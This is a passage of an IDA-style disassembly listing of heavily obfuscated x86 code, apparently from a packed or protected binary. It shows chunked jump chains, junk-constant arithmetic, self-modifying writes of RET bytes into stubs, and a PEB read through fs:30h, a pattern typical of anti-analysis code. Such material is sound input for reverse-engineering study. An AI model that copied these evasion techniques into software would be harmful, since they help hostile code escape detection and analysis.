		jmp	loc_446A50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45282D

loc_453B61:				; CODE XREF: sub_45282D+3F61j
		pop	edi
		lea	eax, nullsub_8
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_8
; END OF FUNCTION CHUNK	FOR sub_45282D

; =============== S U B	R O U T	I N E =======================================



sub_453B70	proc near		; DATA XREF: .data:off_428928o

; FUNCTION CHUNK AT 00448E31 SIZE 00000006 BYTES

		call	nullsub_22
		jmp	loc_448E31
sub_453B70	endp

; ---------------------------------------------------------------------------

loc_453B7A:				; CODE XREF: k2vbe3.d:loc_44119Aj
		xor	edx, 97A2BCE3h
		call	sub_45B20A
		call	sub_4436CE
		push	offset sub_45C14C
		jmp	locret_44B85A
; ---------------------------------------------------------------------------

loc_453B94:				; CODE XREF: k2vbe3.d:00452817j
		pop	eax
		add	eax, 8FA2AF70h
		rol	eax, 1
		xor	eax, 0F46DE2FDh
		add	eax, ebp
		add	eax, 0BD1F0A79h
		jmp	loc_45167E
; ---------------------------------------------------------------------------

loc_453BB0:				; CODE XREF: k2vbe3.d:00457019j
					; k2vbe3.d:0045A6DAj
		ror	eax, 19h
		push	esi
		push	14E3CAF2h
		pop	esi
		jmp	loc_4584AC
; ---------------------------------------------------------------------------

loc_453BBF:				; DATA XREF: sub_45A078+9o
		jmp	loc_446F81
; ---------------------------------------------------------------------------
		jmp	loc_451CE5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FCA0

loc_453BC9:				; CODE XREF: k2vbe3.d:loc_44292Fj
					; sub_43FCA0:loc_44EFC3j
		mov	eax, large fs:30h
		push	esi
		push	33E2CCEh
		not	esi
		jmp	loc_459F35
; END OF FUNCTION CHUNK	FOR sub_43FCA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_453BDD:				; CODE XREF: sub_4553CC-1648Ej
		jz	loc_450DC3
		jmp	loc_43FA55
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------

loc_453BE8:				; CODE XREF: k2vbe3.d:004595C2j
		add	edi, ebx

loc_453BEA:				; CODE XREF: k2vbe3.d:loc_459341j
		jle	loc_440731
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_453BF0:				; CODE XREF: sub_44662B:loc_4595A7j
		or	edi, 67BECFE0h
		rol	edi, 5
		add	edi, 86B25B1h
		popf
		push	offset sub_45850F
		jmp	loc_447DD4
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_453C0A:				; CODE XREF: sub_43F7AC-12E9j
		mov	ebp, esi
		shr	ebx, 18h
		and	edx, 5E524676h
		jmp	loc_43D99E
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45156D

loc_453C1A:				; CODE XREF: sub_45156D+403j
		mov	eax, 475BA966h
		call	sub_451759
		push	offset loc_44A59D
		jmp	nullsub_147
; END OF FUNCTION CHUNK	FOR sub_45156D
; ---------------------------------------------------------------------------
		jmp	ds:off_41E000
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_453C34:				; CODE XREF: sub_443F0D:loc_44933Cj
					; sub_443F0D:loc_44DCE1j ...
		js	loc_45BF65
		pop	edx
		mov	eax, [esp+4+var_4]
		jmp	sub_44601F
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_453C43:				; CODE XREF: sub_43D7A9:loc_45B2FCj
		and	eax, 3185B725h
		add	eax, 1161674Dh
		and	eax, 9FE52513h
		cmp	eax, 1C34A46Ah
		jmp	loc_456275
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_453C60:				; CODE XREF: sub_44B94B-E933j
		mov	eax, 0DE4BE5A2h
		xchg	edi, [ecx]
		jmp	loc_4408F1
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0F6

loc_453C6C:				; CODE XREF: sub_44E0F6:loc_43C7A8j
		or	eax, eax
		jnz	loc_454A0C
		jmp	loc_45247C
; END OF FUNCTION CHUNK	FOR sub_44E0F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_453C79:				; CODE XREF: sub_449372:loc_43C109j
		pop	eax
		pop	ebx
		xchg	ebx, [esp-0Ch+arg_4]
		mov	ecx, ebx
		jmp	loc_44C26C
; END OF FUNCTION CHUNK	FOR sub_449372
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_147. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_453C86:				; CODE XREF: sub_44469A+1448Bj
		jmp	loc_4560A7
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_453C8B:				; CODE XREF: sub_457DCA-156F0j
		jmp	loc_441E28
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_453C90:				; CODE XREF: sub_43DFE1:loc_440327j
		add	ebx, 96A45A7Bh
		mov	[ebx], eax
		pop	ebx
		push	1Ch
		push	0DE98EE88h
		pop	eax
		jmp	loc_444646
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B44A

loc_453CA6:				; CODE XREF: sub_44B44A:loc_43C10Ej
		mov	eax, [eax]
		add	eax, [ebp-4]
		push	offset sub_45A67D

loc_453CB0:				; CODE XREF: k2vbe3.d:00448E20j
		jmp	nullsub_481
; END OF FUNCTION CHUNK	FOR sub_44B44A
; ---------------------------------------------------------------------------
		push	edi
		jmp	sub_447CC0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_453CBB:				; CODE XREF: sub_45A323+1EFDj
		add	ebp, 8B1CF0C4h

loc_453CC1:				; CODE XREF: sub_45A323:loc_44B48Aj
		lea	eax, [ebp-2BBh]
		push	offset sub_44E059
		jmp	nullsub_388
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		pop	edx
		pop	eax
		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp]
		push	0B5B47393h
		jmp	loc_4436F2
; ---------------------------------------------------------------------------
		db 0F0h
		dd 0D2A3BF30h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_453CE8:				; CODE XREF: sub_44DB59-11533j
		jmp	loc_4586B9
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
		db 0BCh, 2Fh, 39h
dword_453CF0	dd 706B777Eh		; DATA XREF: k2vbe3.d:loc_441AD2w
dword_453CF4	dd 5E3BEA2Eh		; DATA XREF: sub_4404D0+Ew
					; k2vbe3.d:00442106r ...
; ---------------------------------------------------------------------------

loc_453CF8:				; CODE XREF: k2vbe3.d:00452CC6j
		jmp	nullsub_250
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4597AE

loc_453CFD:				; CODE XREF: sub_4597AE-160EDj
		jmp	nullsub_1
; END OF FUNCTION CHUNK	FOR sub_4597AE
; ---------------------------------------------------------------------------
		dw 2ED9h
dword_453D04	dd 7C15h		; DATA XREF: k2vbe3.d:0043F4A5r
					; sub_443FC1:loc_443257w ...
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451CF1

loc_453D08:				; CODE XREF: sub_451CF1+9333j
		jmp	loc_44E9C6
; END OF FUNCTION CHUNK	FOR sub_451CF1
; ---------------------------------------------------------------------------
		jl	loc_4428FB
		jmp	sub_43D66F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440CA

loc_453D18:				; CODE XREF: sub_4440CA-3723j
		jl	loc_4471AA
		and	edx, eax
		pop	edx
		adc	edx, 44B401Ah
		jmp	loc_445F11
; END OF FUNCTION CHUNK	FOR sub_4440CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_453D2C:				; CODE XREF: sub_440CEA:loc_454D58j
		jnz	loc_43DAC8
		jmp	loc_45640D
; END OF FUNCTION CHUNK	FOR sub_440CEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454447

loc_453D37:				; CODE XREF: sub_454447:loc_448F81j
		pop	ebx
		sub	ebx, 25F13711h
		and	ebx, 77B78DDh
		xor	ebx, 0F5307267h
		sub	ebx, 0C7116B3Bh
		xor	ebx, 2F1FF76Bh
		jmp	loc_44B23C
; END OF FUNCTION CHUNK	FOR sub_454447
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EBB

loc_453D5B:				; CODE XREF: sub_454EBB:loc_4505E9j
		push	offset loc_45AEA1
		jmp	nullsub_484
; END OF FUNCTION CHUNK	FOR sub_454EBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_453D65:				; CODE XREF: sub_446E24+DE5Aj
		mov	ebp, 4B1D86ADh
		pop	eax
		test	edi, 994CBC4Dh
		jmp	loc_453232
; END OF FUNCTION CHUNK	FOR sub_446E24
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_414. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_453D77:				; CODE XREF: sub_450F71+AB7Cj
		rol	eax, 11h
		push	eax
		push	ecx
		push	3822FF6h
		jmp	loc_456EC7
; END OF FUNCTION CHUNK	FOR sub_450F71
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_214. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_453D87:				; CODE XREF: k2vbe3.d:00457EDEj
		jg	nullsub_159
		mov	edx, [ecx]
		xor	esi, ebp
		jmp	loc_444AF3
; ---------------------------------------------------------------------------
		jns	loc_44E57C
		sbb	eax, 985536FFh
		jmp	sub_44E388
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44863D

loc_453DA7:				; CODE XREF: sub_44863D+E671j
		xor	ebp, ecx
		test	esi, edi
		jmp	loc_44FBEE
; END OF FUNCTION CHUNK	FOR sub_44863D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4541EC

loc_453DB0:				; CODE XREF: sub_4541EC:loc_458247j
		pop	ecx
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_4541EC
; ---------------------------------------------------------------------------

loc_453DB4:				; CODE XREF: k2vbe3.d:00443E3Bj
		jmp	nullsub_493

; =============== S U B	R O U T	I N E =======================================



sub_453DB9	proc near		; CODE XREF: sub_45B74D-14C7Cj

; FUNCTION CHUNK AT 004491E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459C3E SIZE 00000016 BYTES

		add	esp, 0FFFFFFF8h
		mov	[ebp-8], edx
		jmp	loc_4491E1
sub_453DB9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xor	ebx, 74E8E1Dh
		jmp	sub_45423A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440B5

loc_453DCF:				; CODE XREF: sub_4440B5+EDD4j
		pop	ecx
		rol	ecx, 1Eh
		xor	ecx, 0B3610327h
		rol	ecx, 1Ch
		jmp	loc_452C2C
; END OF FUNCTION CHUNK	FOR sub_4440B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_453DE1:				; CODE XREF: sub_43EEC6+5DECj
		push	eax
		jmp	loc_442D15
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E00F

loc_453DE7:				; CODE XREF: sub_44E00F:loc_44B033j
		push	offset sub_459AD2
		jmp	loc_44C4D2
; END OF FUNCTION CHUNK	FOR sub_44E00F

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_453DF1	proc near		; CODE XREF: sub_441AE3+173EFj
		retn
sub_453DF1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_453DF2:				; CODE XREF: sub_457DCA-9AB5j
		jmp	loc_43E0C3
; END OF FUNCTION CHUNK	FOR sub_457DCA

; =============== S U B	R O U T	I N E =======================================



sub_453DF7	proc near		; DATA XREF: k2vbe3.d:0044C7D3o
		xor	edx, 0F4E3A6CAh
		call	sub_43CEC9
		adc	eax, 0A878AC99h
		jmp	sub_454EDD
sub_453DF7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A634

loc_453E0D:				; CODE XREF: sub_45A634:loc_44A9ECj
		xor	eax, 4A6323A2h
		add	eax, ebp
		add	eax, 65D33C0Eh
		mov	eax, [eax]
		push	eax
		call	sub_43CC89
		jmp	loc_45BE9C
; END OF FUNCTION CHUNK	FOR sub_45A634
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_114. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440B5

loc_453E29:				; CODE XREF: sub_4440B5+C9C0j
		jmp	loc_4599D4
; END OF FUNCTION CHUNK	FOR sub_4440B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4536DC

loc_453E2E:				; CODE XREF: sub_4536DC:loc_453257j
		and	edi, 4D2EAEA9h
		xor	edi, 3B79632h
		add	edi, 0F5AE31BAh
		push	offset loc_4563DF
		jmp	loc_454CDA
; END OF FUNCTION CHUNK	FOR sub_4536DC
; ---------------------------------------------------------------------------
		push	eax
		push	offset loc_456988
		jmp	loc_44EA15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F7AC

loc_453E55:				; CODE XREF: sub_43F7AC+16174j
		xor	eax, 69E25207h
		or	eax, 71BE0253h
		add	eax, 894D0E0Dh
		xor	eax, 894BB166h
		call	sub_44ADEC
		jmp	loc_443AC3
; END OF FUNCTION CHUNK	FOR sub_43F7AC
; ---------------------------------------------------------------------------

loc_453E77:				; DATA XREF: sub_4482F2+4BC3o
		mov	eax, [esp]
		call	sub_453347
		retn
; ---------------------------------------------------------------------------

loc_453E80:				; CODE XREF: k2vbe3.d:0044F680j
		jmp	loc_455460
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_453E85:				; CODE XREF: sub_451EB7-B259j
		jmp	loc_44C0B6
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AB7E

loc_453E8A:				; CODE XREF: sub_45AB7E-1C34Aj
		jmp	loc_43DDD3
; END OF FUNCTION CHUNK	FOR sub_45AB7E
; ---------------------------------------------------------------------------
		db 9Bh
dword_453E90	dd 0			; DATA XREF: sub_43DEBE:loc_44855Ar
					; sub_43DEBE:loc_45327Er

; =============== S U B	R O U T	I N E =======================================



sub_453E94	proc near		; CODE XREF: sub_407CFA+1Dp
					; sub_407D3A+25p ...
		call	sub_453E9F
		jmp	ds:off_41E0F8
sub_453E94	endp


; =============== S U B	R O U T	I N E =======================================



sub_453E9F	proc near		; CODE XREF: k2vbe3.d:0043E912j
					; sub_453E94p ...

; FUNCTION CHUNK AT 0044082A SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004434F1 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456758 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457798 SIZE 00000007 BYTES

		call	sub_44D022

loc_453EA4:				; CODE XREF: sub_44DAF6+A94Dj
		jmp	loc_44082A
sub_453E9F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E107

loc_453EA9:				; CODE XREF: sub_43E107+Aj
		jmp	loc_43ED48
; END OF FUNCTION CHUNK	FOR sub_43E107
; ---------------------------------------------------------------------------

loc_453EAE:				; DATA XREF: sub_456C5F-12EE6o
		test	al, al
		jz	loc_44BACD
		jmp	loc_44B099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DEBE

loc_453EBB:				; CODE XREF: sub_43DEBE:loc_4505D1j
		call	sub_44AD1E
; END OF FUNCTION CHUNK	FOR sub_43DEBE
; START	OF FUNCTION CHUNK FOR sub_459AEA

loc_453EC0:				; CODE XREF: sub_459AEA:loc_45172Aj
		mov	eax, edx
		push	offset sub_4517D6
		jmp	loc_44CEF4
; END OF FUNCTION CHUNK	FOR sub_459AEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453347

loc_453ECC:				; CODE XREF: sub_453347-9D42j
		or	edx, 10E67005h

loc_453ED2:				; CODE XREF: sub_453347:loc_44F9E5j
		push	0
		push	esi
		push	415093E4h
		pop	esi
		and	esi, 3556867Dh
		jmp	loc_458689
; END OF FUNCTION CHUNK	FOR sub_453347
; ---------------------------------------------------------------------------
		jb	loc_440EAD
		jmp	loc_45BFFC
; ---------------------------------------------------------------------------

loc_453EF1:				; CODE XREF: k2vbe3.d:00447BE3j
		jg	sub_4408BD
		and	ecx, 0D289A368h
		or	edi, 0FD210F2Bh
		jno	loc_450F4D
; START	OF FUNCTION CHUNK FOR sub_43EDE6

loc_453F09:				; CODE XREF: sub_43EDE6:loc_447BD1j
		add	esi, 48C70FDAh
		xchg	esi, [esp+4+var_4]
		jmp	loc_454115
; END OF FUNCTION CHUNK	FOR sub_43EDE6

; =============== S U B	R O U T	I N E =======================================



sub_453F17	proc near		; DATA XREF: sub_44ED3C-10A7Do

; FUNCTION CHUNK AT 00458739 SIZE 0000000B BYTES

		cmp	dword ptr [ebp-10h], 0
		jz	loc_44A78F
		jmp	loc_458739
sub_453F17	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_453F26:				; CODE XREF: sub_45B20A:loc_448C5Ej
		jz	loc_4467B8
		cmp	edi, edx
		jmp	loc_452215
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F49C

loc_453F33:				; CODE XREF: sub_44F49C:loc_45BA05j
		xchg	edx, [esp+4+var_4]
		mov	ebp, esp
		push	edx
		mov	edx, ecx
		xchg	edx, [esp+8+var_8]
		push	esi
		push	offset sub_44DAF6
		jmp	loc_43E0E0
; END OF FUNCTION CHUNK	FOR sub_44F49C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A2D

loc_453F49:				; CODE XREF: sub_442A2D+9j
		xchg	ebp, [esp-4+arg_0]
		mov	eax, ebp
		pop	ebp
		pop	edx
		pop	ebp
		jmp	sub_44B2D7
; END OF FUNCTION CHUNK	FOR sub_442A2D
; ---------------------------------------------------------------------------

loc_453F56:				; CODE XREF: k2vbe3.d:0044FF5Bj
		shl	ebx, 13h

; =============== S U B	R O U T	I N E =======================================



sub_453F59	proc near		; CODE XREF: k2vbe3.d:00451A0Ep
		xchg	edx, [esp+0]
		pop	edx
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+0]
		jmp	loc_449437
sub_453F59	endp

; ---------------------------------------------------------------------------

loc_453F68:				; CODE XREF: k2vbe3.d:0044C66Dj
		jb	loc_4594C4

loc_453F6E:				; CODE XREF: k2vbe3.d:loc_452B4Ej
		add	edi, 801DC870h
		mov	[edi], eax
		pop	edi
		lea	eax, nullsub_514
		mov	byte ptr [eax],	0C3h
		jmp	loc_444F40
; ---------------------------------------------------------------------------

loc_453F85:				; CODE XREF: k2vbe3.d:004558F9j
		mov	eax, [esp]
		jmp	loc_45561C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_154. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_453F8E:				; CODE XREF: sub_456666-E3D9j
		jmp	loc_44E02C
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A992

loc_453F93:				; CODE XREF: sub_44A992-2F0Aj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_44A992
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_198. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		jge	loc_447D44
		jmp	sub_43E1FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_453FA4:				; CODE XREF: sub_44DB59-9DF0j
		mov	ebx, 97ED4664h

loc_453FA9:				; CODE XREF: sub_44DB59-11539j
					; sub_44DB59:loc_43E8E1j ...
		jmp	loc_4492BB
; ---------------------------------------------------------------------------

loc_453FAE:				; CODE XREF: sub_44DB59-644Ej
					; sub_44DB59+B54Aj
		xchg	edi, [esp-8+arg_4]
		mov	ecx, edi
		pop	edi
		push	offset sub_44A7BB
		jmp	nullsub_243
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
		xchg	ecx, [ebp+0]
		jmp	loc_45293E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441FEB

loc_453FC6:				; CODE XREF: sub_441FEB:loc_454CC8j
		mov	eax, edx
		xchg	eax, [esp+0]

loc_453FCB:				; CODE XREF: k2vbe3.d:loc_459608j
		push	offset sub_4538AB
		jmp	nullsub_174
; END OF FUNCTION CHUNK	FOR sub_441FEB

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_453FD5	proc near		; CODE XREF: k2vbe3.d:0044D363j
					; sub_4486D7:loc_45AB94j
		retn
sub_453FD5	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_453FD6:				; CODE XREF: sub_4460FD+1B12j
		jmp	sub_45B74D
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------

loc_453FDB:				; CODE XREF: k2vbe3.d:0043E15Ej
					; k2vbe3.d:0043E170j
		add	edx, 251863BEh
		xchg	edx, [esp]
		jmp	sub_44660F
; ---------------------------------------------------------------------------

loc_453FE9:				; DATA XREF: sub_448113-15D6o
		mov	[ebp-0Ch], eax
		jmp	loc_44962A

; =============== S U B	R O U T	I N E =======================================



sub_453FF1	proc near		; CODE XREF: sub_440CEA:loc_43DACEp
					; sub_44B979:loc_451411p ...

; FUNCTION CHUNK AT 0043DBBE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DEE1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043E8C7 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00440753 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444AD6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044BC05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045089E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456185 SIZE 0000000D BYTES

		jns	sub_444AE6
		push	ebp
		mov	ebp, esp
		push	ecx
		jmp	loc_43DEE1
sub_453FF1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456471

loc_454000:				; CODE XREF: sub_456471+Fj
		xchg	ecx, edx

loc_454002:				; CODE XREF: sub_450F71:loc_43F036j
		call	sub_44128B
		mov	edx, 0DDABAF17h
		call	sub_45B20A
		push	offset loc_441276
		jmp	nullsub_208
; END OF FUNCTION CHUNK	FOR sub_456471
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_45401B:				; CODE XREF: sub_443BDF:loc_452175j
		or	eax, 0DCDE3F45h
; END OF FUNCTION CHUNK	FOR sub_443BDF
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_454021:				; CODE XREF: sub_43D7A9:loc_44DB8Dj
		add	eax, offset byte_4754FD
		xchg	eax, [esp+0]
		jmp	sub_45B74D
; END OF FUNCTION CHUNK	FOR sub_43D7A9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454639

loc_45402F:				; CODE XREF: sub_454639:loc_454648j
		jz	loc_44E54F
		jmp	loc_449CDE
; END OF FUNCTION CHUNK	FOR sub_454639
; ---------------------------------------------------------------------------

loc_45403A:				; CODE XREF: k2vbe3.d:0044051Dj
		jz	loc_44E6FC
; START	OF FUNCTION CHUNK FOR sub_459D58

loc_454040:				; CODE XREF: sub_459D58+7j
		jmp	loc_449918
; END OF FUNCTION CHUNK	FOR sub_459D58
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_454045:				; CODE XREF: sub_4570C0-18119j
		jmp	loc_43FB18
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------
		jnp	sub_441FEB
		push	77E98ADh
		jmp	loc_44E6FC
; ---------------------------------------------------------------------------
		xor	esi, ebx
		jmp	sub_451214
; ---------------------------------------------------------------------------
		mov	eax, [ebp-30h]
		push	ecx
		push	0FCF3A5CEh
		pop	ecx
		sub	ecx, 93B1D6B4h
		add	ecx, 0E525389Ch
		add	ecx, ebp
		add	ecx, 0B198F846h
		jmp	loc_447DE9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4585F2

loc_454084:				; CODE XREF: sub_4585F2-108C9j
		sbb	eax, 9CFCEE42h
; END OF FUNCTION CHUNK	FOR sub_4585F2
; START	OF FUNCTION CHUNK FOR sub_454354

loc_45408A:				; CODE XREF: sub_4585F2:loc_44011Dj
					; sub_454354-11C28j ...
		jmp	loc_4487A6
; ---------------------------------------------------------------------------

loc_45408F:				; CODE XREF: sub_454354+7j
					; sub_4585F2+3j
		push	offset sub_44F4C7
		jmp	nullsub_154
; END OF FUNCTION CHUNK	FOR sub_454354

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_454099	proc near		; CODE XREF: sub_44AFD4+5833j
		retn
sub_454099	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_45409A:				; CODE XREF: sub_454E69:loc_441916j
		call	sub_440B4F

loc_45409F:				; CODE XREF: sub_4536DC+334Fj
		jmp	loc_44B3BA
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D7A9

loc_4540A4:				; CODE XREF: sub_43D7A9+330Cj
		jmp	sub_4461D5
; END OF FUNCTION CHUNK	FOR sub_43D7A9

; =============== S U B	R O U T	I N E =======================================



sub_4540A9	proc near		; DATA XREF: k2vbe3.d:0044E022o
		lea	eax, nullsub_522

loc_4540AF:				; CODE XREF: k2vbe3.d:loc_4521A3j
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_522
sub_4540A9	endp

; ---------------------------------------------------------------------------
		call	nullsub_518
		jmp	ds:dword_41E1B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F817

loc_4540C2:				; CODE XREF: sub_44F817:loc_44F824j
		jmp	loc_44DFFC
; END OF FUNCTION CHUNK	FOR sub_44F817
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_518. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		test	dl, al
		add	byte ptr [eax],	0
		jmp	loc_43C893
; ---------------------------------------------------------------------------
		or	ebx, 2CAEF30Bh
		jmp	loc_45575F
; ---------------------------------------------------------------------------

loc_4540DD:				; CODE XREF: k2vbe3.d:004479D9j
		or	ebp, 7DF4D3EFh
; START	OF FUNCTION CHUNK FOR sub_44EBBF

loc_4540E3:				; CODE XREF: sub_44EBBF:loc_448C87j
		xor	ecx, 0ED93DCF4h
		or	ecx, 4A311907h
		add	ecx, 5C49195h
		xchg	ecx, [esp+4+var_4]
		jmp	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_44EBBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445124

loc_4540FD:				; CODE XREF: sub_445124:loc_441BA8j
					; k2vbe3.d:00441BBAj
		add	esi, 0D0491398h
		add	eax, esi
		call	sub_454F9F
		jmp	ds:off_41E118
; END OF FUNCTION CHUNK	FOR sub_445124
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_454110:				; CODE XREF: sub_4529E2:loc_43C163j
		jmp	nullsub_334
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B58F

loc_454115:				; CODE XREF: sub_440F1B+7j
					; sub_44B58F:loc_44410Cj ...
		call	sub_444A86

loc_45411A:				; CODE XREF: sub_441A09+A459j
		jmp	loc_455A30
; END OF FUNCTION CHUNK	FOR sub_44B58F
; ---------------------------------------------------------------------------

loc_45411F:				; CODE XREF: k2vbe3.d:0043D727j
		jmp	loc_44483C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45634D

loc_454124:				; CODE XREF: sub_45634D-AC6Bj
		call	sub_457D2E
; END OF FUNCTION CHUNK	FOR sub_45634D
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_454129:				; CODE XREF: sub_44E90D-B04j
					; k2vbe3.d:0045C05Ej
		adc	esi, 3A90DEF5h

loc_45412F:				; CODE XREF: sub_44E90D:loc_44AB36j
		push	0AE534AC9h
		xor	eax, 983B119h
		jmp	loc_44C819
